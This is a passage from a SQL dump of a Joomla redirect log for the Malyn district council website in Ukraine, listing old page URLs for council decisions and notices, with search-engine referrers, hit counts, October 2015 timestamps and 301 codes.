00:00:00',301),(15437,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11&lang=ru','','','',1,0,'2015-10-30 21:38:22','0000-00-00 00:00:00',301),(15438,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=56&Itemid=97&lang=uk','','','',49,0,'2015-10-30 21:41:09','0000-00-00 00:00:00',301),(15439,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/914-pro-zatverdzhennya-rajonnoji-programi-polipshennya-medichnogo-obslugovuvannya-silskogo-naselennya-malinskogo-rajonu-na-2015-2019-roki','','','',35,0,'2015-10-30 21:43:16','0000-00-00 00:00:00',301),(15440,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/768-pro-peredachu-avtobusa','','','',57,0,'2015-10-30 21:46:23','0000-00-00 00:00:00',301),(15441,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/506-pro-hid-vikonannja-rajonnoi-programi-prizovna_2','','','',39,0,'2015-10-30 21:52:36','0000-00-00 00:00:00',301),(15442,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39&layout=blog&Itemid=76&lang=ru&limitstart=15','','','',4,0,'2015-10-30 21:57:06','0000-00-00 00:00:00',301),(15443,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/58-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012','','','',10,0,'2015-10-30 22:34:16','0000-00-00 00:00:00',301),(15444,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/397-pro-skasuvannja-rishennja-rajonnoi-radi-vid-12','','','',6,0,'2015-10-30 22:34:17','0000-00-00 00:00:00',301),(15445,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=en','','','',16,0,'2015-10-30 22:36:05','0000-00-00 00:00:00',301),(15446,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=489:2011-12-02-06-51-07&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-10-30 22:40:18','0000-00-00 00:00:00',301),(15447,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=32&Itemid=64&lang=uk','','','',4,0,'2015-10-30 22:59:19','0000-00-00 00:00:00',301),(15448,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/149-pro-hid-vikonannja-rajonnoi-programi_4','','','',22,0,'2015-10-30 23:08:43','0000-00-00 00:00:00',301),(15449,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1188-pro-vnesennya-zmin-do-strukturi-vikonavchogo-aparatu-rajonnoji-radi','','','',17,0,'2015-10-30 23:15:05','0000-00-00 00:00:00',301),(15450,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/286-pro-zatverdzhennja-statutu-komunalnogo','','','',4,0,'2015-10-30 23:15:34','0000-00-00 00:00:00',301),(15451,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/807-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_26','','','',27,0,'2015-10-30 23:15:38','0000-00-00 00:00:00',301),(15452,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/824-pro-stan-nadannja-medichnoi-dopomogi-zhiteljam','','','',28,0,'2015-10-30 23:23:42','0000-00-00 00:00:00',301),(15453,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/446-pro-zatverdzhennja-dogovoru-pro-nadannja-subvencii_2','','','',39,0,'2015-10-30 23:25:53','0000-00-00 00:00:00',301),(15454,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-?start=14','','','',38,0,'2015-10-30 23:26:04','0000-00-00 00:00:00',301),(15456,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/458-pro-vnesennja-zmin-do-rajonnoi-programi_3','','','',32,0,'2015-10-30 23:26:50','0000-00-00 00:00:00',301),(15457,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=596:2012-02-28-12-59-05&catid=40:--28032012-&Itemid=77&lang=uk','','','',3,0,'2015-10-30 23:27:13','0000-00-00 00:00:00',301),(15458,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/914-pro-zatverdzhennya-rajonnoji-programi-polipshennya-medichnogo-obslugovuvannya-silskogo-naselennya-malinskogo-rajonu-na-20','','','',1,0,'2015-10-30 23:27:42','0000-00-00 00:00:00',301),(15459,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-?start=14','','','',14,0,'2015-10-31 00:04:22','0000-00-00 00:00:00',301),(15460,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=142:2010-10-15-06-19-49&catid=27:---1932-33-&Itemid=58&lang=uk','','','',6,0,'2015-10-31 00:09:38','0000-00-00 00:00:00',301),(15461,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=703:-2012-&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-10-31 00:31:50','0000-00-00 00:00:00',301),(15462,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1138-vishivska-silska-rada-informue','','http://go.mail.ru/search_images','',23,0,'2015-10-31 00:42:28','0000-00-00 00:00:00',301),(15463,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/63-rishennya-vid-17-09-2014-roku/865-pro-vnesennya-zmin-do-pereliku-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu','','','',1,0,'2015-10-31 00:54:09','0000-00-00 00:00:00',301),(15464,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=13:2010-06-06-04-07-00&catid=13:2010-06-06-03-57-58&Itemid=33&lang=uk','','','',6,0,'2015-10-31 01:02:13','0000-00-00 00:00:00',301),(15465,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11032013-','','','',14,0,'2015-10-31 01:02:21','0000-00-00 00:00:00',301),(15466,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/63-rishennya-vid-17-09-2014-roku/866-pro-pogodzhennya-zvilnennya-ta-priznachennya-na-posadi-direktoriv-shkil-rajonu','','','',1,0,'2015-10-31 01:07:17','0000-00-00 00:00:00',301),(15467,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=999:2013-04-28-05-21-05&lang=en&option=com_content&view=article','','','',4,0,'2015-10-31 02:33:51','0000-00-00 00:00:00',301),(15468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2015-10-31 02:39:36','0000-00-00 00:00:00',301),(15469,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=546:-l-r-&catid=39:-22022012-&Itemid=76&lang=uk','','','',3,0,'2015-10-31 02:44:15','0000-00-00 00:00:00',301),(15470,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=uk','','','',69,0,'2015-10-31 03:28:12','0000-00-00 00:00:00',301),(15471,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=50&Itemid=90&lang=ru','','','',8,0,'2015-10-31 03:35:00','0000-00-00 00:00:00',301),(15472,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/181-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_2','','','',2,0,'2015-10-31 03:41:24','0000-00-00 00:00:00',301),(15473,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/357-pro-hid-vikonannja-rajonnoi-programi_6?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 03:41:50','0000-00-00 00:00:00',301),(15474,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/112-pro-hid-vikonannja-rajonnoi-programi_3','','','',4,0,'2015-10-31 03:44:27','0000-00-00 00:00:00',301),(15475,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/113-pro-rajonnu-programu-individualnogo-zhitlovogo?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 03:44:49','0000-00-00 00:00:00',301),(15476,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/46-pro-vnesennja-zmin-do-programi-zaluchennja?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 03:45:02','0000-00-00 00:00:00',301),(15477,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/97-pro-zatverdzhennja-polozhennja-pro-porjadok','','','',4,0,'2015-10-31 03:45:20','0000-00-00 00:00:00',301),(15478,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/607-pro-nadannja-dozvolu-na-rozroblennja-detalnogo_2?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 03:47:34','0000-00-00 00:00:00',301),(15479,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/608-pro-prodovzhennja-dii-kontraktu-z-kerivnikom','','','',4,0,'2015-10-31 03:47:40','0000-00-00 00:00:00',301),(15480,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/611-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_21','','','',4,0,'2015-10-31 03:48:00','0000-00-00 00:00:00',301),(15481,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/612-pro-vnesennja-zmin-do-programi-zajnjatosti_3?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 03:48:23','0000-00-00 00:00:00',301),(15482,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/4-pro-zatverdzhennja-kompleksnoi-programi-rozvitku','','','',5,0,'2015-10-31 03:52:24','0000-00-00 00:00:00',301),(15483,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku/929-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=858.EOYV_pxpYGaLcSvdY4yCz0mH-jEjU43cK3G-PCRiysbP8yxi9oWRlxSz64GO5TeZrWtf','',22,0,'2015-10-31 04:38:45','0000-00-00 00:00:00',301),(15484,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/766-pro-pogodzhennja-priznachennja-na-posadu-direktora_4','','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=858.GTazXPgVwtkxnYWu6Lg1jZsLdWgz2oICiXvsUeDFoI7dLeT917pANOhjY2K_4ngO9-ed','',40,0,'2015-10-31 04:38:58','0000-00-00 00:00:00',301),(15485,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1164-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',22,0,'2015-10-31 05:13:47','0000-00-00 00:00:00',301),(15486,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=273:-2011-&catid=31:-25032011&Itemid=62&lang=uk','','','',6,0,'2015-10-31 05:17:43','0000-00-00 00:00:00',301),(15487,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/247-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi','','','',17,0,'2015-10-31 05:54:34','0000-00-00 00:00:00',301),(15488,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/68-rishennya-vid-25-09-2014-roku/880-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','','','',4,0,'2015-10-31 07:47:04','0000-00-00 00:00:00',301),(15489,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/980-pro-vikonannya-planu-roboti-rajonnoji-radi-za-2014-rik-ta-plan-roboti-rajonnoji-radi-na-i-pivrichchya-2015-roku','','','',5,0,'2015-10-31 07:47:04','0000-00-00 00:00:00',301),(15490,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/266-pro-vnesennja-zmin-do-rajonnoi-programi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-10-31 07:47:06','0000-00-00 00:00:00',301),(15491,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30122010-','','','',12,0,'2015-10-31 07:47:06','0000-00-00 00:00:00',301),(15492,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/518-pro-vnesennja-zmin-do-proektu-formuvannja?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 07:47:08','0000-00-00 00:00:00',301),(15493,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-','','','',11,0,'2015-10-31 07:47:09','0000-00-00 00:00:00',301),(15494,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/519-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013','','','',6,0,'2015-10-31 07:47:09','0000-00-00 00:00:00',301),(15495,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/315-pro-vnesennja-zmin-do-programi-vidpochinku-ta','','','',8,0,'2015-10-31 07:47:11','0000-00-00 00:00:00',301),(15496,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=en','','','',11,0,'2015-10-31 07:47:12','0000-00-00 00:00:00',301),(15497,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1056-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',8,0,'2015-10-31 07:47:26','0000-00-00 00:00:00',301),(15498,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku/879-pro-nadannya-prava-malinskij-rajonnij-radi-zdijsniti-pererakhuvannya-koshtiv','','','',7,0,'2015-10-31 07:47:26','0000-00-00 00:00:00',301),(15499,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-09-2014-roku','','','',11,0,'2015-10-31 07:47:50','0000-00-00 00:00:00',301),(15500,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/266-pro-vnesennja-zmin-do-rajonnoi-programi','','','',10,0,'2015-10-31 07:47:53','0000-00-00 00:00:00',301),(15501,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/668-pro-zatverdzhennja-rozporjadzhennja-golovi_2','','','',6,0,'2015-10-31 07:47:56','0000-00-00 00:00:00',301),(15502,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/505-pro-spisannja-avtomobilja?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 07:47:58','0000-00-00 00:00:00',301),(15503,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/514-pro-zatverdzhennja-rezultativ-aukcionnih-torgiv-z?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 07:48:00','0000-00-00 00:00:00',301),(15504,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/518-pro-vnesennja-zmin-do-proektu-formuvannja','','','',9,0,'2015-10-31 07:48:00','0000-00-00 00:00:00',301),(15505,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/519-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-10-31 07:48:02','0000-00-00 00:00:00',301),(15506,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-','','','',10,0,'2015-10-31 07:48:04','0000-00-00 00:00:00',301),(15507,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012','','','',7,0,'2015-10-31 07:48:22','0000-00-00 00:00:00',301),(15508,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=30&Itemid=61&lang=en','','','',19,0,'2015-10-31 07:48:23','0000-00-00 00:00:00',301),(15509,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-','','','',8,0,'2015-10-31 07:49:21','0000-00-00 00:00:00',301),(15510,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--23042013-/524-pro-zatverdzhennja-rezultativ-aukcionnih-torgiv-z_2','','','',8,0,'2015-10-31 07:49:22','0000-00-00 00:00:00',301),(15511,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/446-pro-zatverdzhennja-dogovoru-pro-nadannja-subvencii_2','','','',12,0,'2015-10-31 07:49:22','0000-00-00 00:00:00',301),(15512,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/999-pro-rajonnij-byudzhet-na-2015-rik','','','',7,0,'2015-10-31 07:49:27','0000-00-00 00:00:00',301),(15513,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1188-pro-vnesennya-zmin-do-strukturi-vikonavchogo-aparatu-rajonnoji-radi','','','',10,0,'2015-10-31 07:49:28','0000-00-00 00:00:00',301),(15514,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014','','','',9,0,'2015-10-31 07:49:28','0000-00-00 00:00:00',301),(15515,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/912-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',1,0,'2015-10-31 07:49:29','0000-00-00 00:00:00',301),(15516,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/981-pro-zatverdzhennya-programi-rozvitku-malogo-i-serednogo-pidpriemnitstva-malinskogo-rajonu-na-2015-2016-roki','','','',4,0,'2015-10-31 07:49:29','0000-00-00 00:00:00',301),(15517,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-','','','',12,0,'2015-10-31 07:49:30','0000-00-00 00:00:00',301),(15518,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-','','','',22,0,'2015-10-31 07:49:34','0000-00-00 00:00:00',301),(15519,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/449-pro-aktualizaciju-shemi-planuvannja-malinskogo?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 07:49:36','0000-00-00 00:00:00',301),(15520,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/659-pro-pochatok-navchalnogo-procesu-u','','','',9,0,'2015-10-31 07:49:37','0000-00-00 00:00:00',301),(15521,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/596-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi_2','','','',6,0,'2015-10-31 07:50:33','0000-00-00 00:00:00',301),(15522,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-','','','',7,0,'2015-10-31 07:50:34','0000-00-00 00:00:00',301),(15523,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-','','','',9,0,'2015-10-31 07:50:36','0000-00-00 00:00:00',301),(15524,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-','','','',14,0,'2015-10-31 07:50:37','0000-00-00 00:00:00',301),(15525,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-','','','',8,0,'2015-10-31 07:50:38','0000-00-00 00:00:00',301),(15526,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=69&lang=uk','','','',4,0,'2015-10-31 07:50:39','0000-00-00 00:00:00',301),(15527,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/324-pro-zatverdzhennja-rajonnoi-programi-shhodo','','','',9,0,'2015-10-31 07:50:39','0000-00-00 00:00:00',301),(15528,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/402-pro-zatverdzhennja-rajonnogo-bjudzhetu-na-2013-rik','','','',6,0,'2015-10-31 07:50:40','0000-00-00 00:00:00',301),(15529,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=850:------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2015-10-31 07:50:43','0000-00-00 00:00:00',301),(15530,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=597:-l-r-2011-&catid=40&Itemid=77&lang=uk','','','',12,0,'2015-10-31 08:43:43','0000-00-00 00:00:00',301),(15531,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku?limitstart=0','','','',24,0,'2015-10-31 08:45:30','0000-00-00 00:00:00',301),(15532,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1155-josipivska-silska-rada-informue','','','',29,0,'2015-10-31 09:47:24','0000-00-00 00:00:00',301),(15533,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-','','','',8,0,'2015-10-31 09:48:19','0000-00-00 00:00:00',301),(15534,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--23042013-','','','',8,0,'2015-10-31 09:48:20','0000-00-00 00:00:00',301),(15535,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/447-pro-viznachennja-statusu-muzeju-istorii','','','',4,0,'2015-10-31 09:48:20','0000-00-00 00:00:00',301),(15536,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/445-pro-vnesennja-zmin-do-shtatnogo-rozpisu','','','',11,0,'2015-10-31 09:48:21','0000-00-00 00:00:00',301),(15537,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011','','','',19,0,'2015-10-31 09:48:25','0000-00-00 00:00:00',301),(15538,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-','','','',14,0,'2015-10-31 09:48:26','0000-00-00 00:00:00',301),(15539,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/669-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_4','','','',6,0,'2015-10-31 09:48:26','0000-00-00 00:00:00',301),(15540,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/449-pro-aktualizaciju-shemi-planuvannja-malinskogo','','','',10,0,'2015-10-31 09:48:27','0000-00-00 00:00:00',301),(15541,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-','','','',12,0,'2015-10-31 09:48:27','0000-00-00 00:00:00',301),(15542,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-','','','',8,0,'2015-10-31 09:48:30','0000-00-00 00:00:00',301),(15543,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=31&Itemid=62&lang=ru/','','','',1,0,'2015-10-31 09:48:32','0000-00-00 00:00:00',301),(15544,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/444-pro-pogodzhennja-vvedennja-shtatnoi-odinici_2','','','',9,0,'2015-10-31 09:48:33','0000-00-00 00:00:00',301),(15545,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/69-rishennya-vid-26-11-2014-roku/924-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-z-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki-yaka-peredaetsya-v-orendu-fop-rikhalskij-o-a','','','',1,0,'2015-10-31 09:56:58','0000-00-00 00:00:00',301),(15546,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1070-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-ukrajinkivskoji-silskoji-radi','','','',8,0,'2015-10-31 10:17:35','0000-00-00 00:00:00',301),(15547,'http://www.malyn-rayrada.org.ua/index.php?Itemid=6&catid=5:2010-06-05-12-51-34&id=519:-2011-&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=6&catid=5%3A2010-06-05-12-51-34&id=519%3A-2011-&lang=uk&option=com_content&view=article','',1,0,'2015-10-31 10:19:01','0000-00-00 00:00:00',301),(15548,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/492-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi_3','','','',12,0,'2015-10-31 11:01:06','0000-00-00 00:00:00',301),(15549,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1162-pro-zgodu-na-peredachu-finansovogo-resursu-medichna-subventsiya-dlya-vikonannya-delegovanikh-povnovazhen-po-medichnomu-obslugovuvannyu-naselennya-rajonu','','','',35,0,'2015-10-31 11:31:32','0000-00-00 00:00:00',301),(15550,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/803-pro-plan-roboti-rajonnoi-radi-na-ii-pivrichchja_3','','','',19,0,'2015-10-31 13:25:59','0000-00-00 00:00:00',301),(15551,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=ru','','','',15,0,'2015-10-31 13:56:50','0000-00-00 00:00:00',301),(15552,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=618:2012-03-29-08-39-48&catid=40:--28032012-&Itemid=77&lang=ru','','','',1,0,'2015-10-31 13:56:57','0000-00-00 00:00:00',301),(15553,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1058-oprilyudnennya-vydomostej-pro-dokhodi-za-2014-rik-kerivnitstva-ivanivskoji-silskoji-radi','','','',6,0,'2015-10-31 13:59:10','0000-00-00 00:00:00',301),(15554,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1079-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-dibrivskoji-silskoji-radi','','','',6,0,'2015-10-31 13:59:13','0000-00-00 00:00:00',301),(15555,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1081-oprilyudnennya-vidomostej-pro-dokhodi-za-2014-rik-kerivnitstva-granitnenskoji-selishchnoji-radi','','','',7,0,'2015-10-31 13:59:15','0000-00-00 00:00:00',301),(15556,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1131-granitnenska-selishchna-rada-informue?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 13:59:18','0000-00-00 00:00:00',301),(15557,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1140-starovorob-jivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 13:59:21','0000-00-00 00:00:00',301),(15558,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1141-budo-vorob-jivska-silska-rada-informue','','','',2,0,'2015-10-31 13:59:25','0000-00-00 00:00:00',301),(15559,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/674-pro-zatverdzhennja-rajonnoi-programi-poshuku-i?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:02:17','0000-00-00 00:00:00',301),(15560,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/675-pro-vnesennja-zmin-do-rajonnoi-programi_4','','','',5,0,'2015-10-31 14:02:19','0000-00-00 00:00:00',301),(15561,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/676-pro-vnesennja-zmin-do-rajonnoi-kompleksnoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:02:21','0000-00-00 00:00:00',301),(15562,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/679-pro-zatverdzhennja-porjadku-i-normativiv_4','','','',1,0,'2015-10-31 14:02:23','0000-00-00 00:00:00',301),(15563,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/680-pro-zatverdzhennja-planu-dijalnosti-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:02:25','0000-00-00 00:00:00',301),(15564,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/693-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_15?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:02:28','0000-00-00 00:00:00',301),(15565,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/694-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_16','','','',6,0,'2015-10-31 14:02:30','0000-00-00 00:00:00',301),(15566,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/695-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_17?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:02:33','0000-00-00 00:00:00',301),(15567,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/697-pro-vstanovlennja-nadbavki-do-posadovogo-okladu_3?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:02:36','0000-00-00 00:00:00',301),(15568,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/450-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_4','','','',5,0,'2015-10-31 14:02:38','0000-00-00 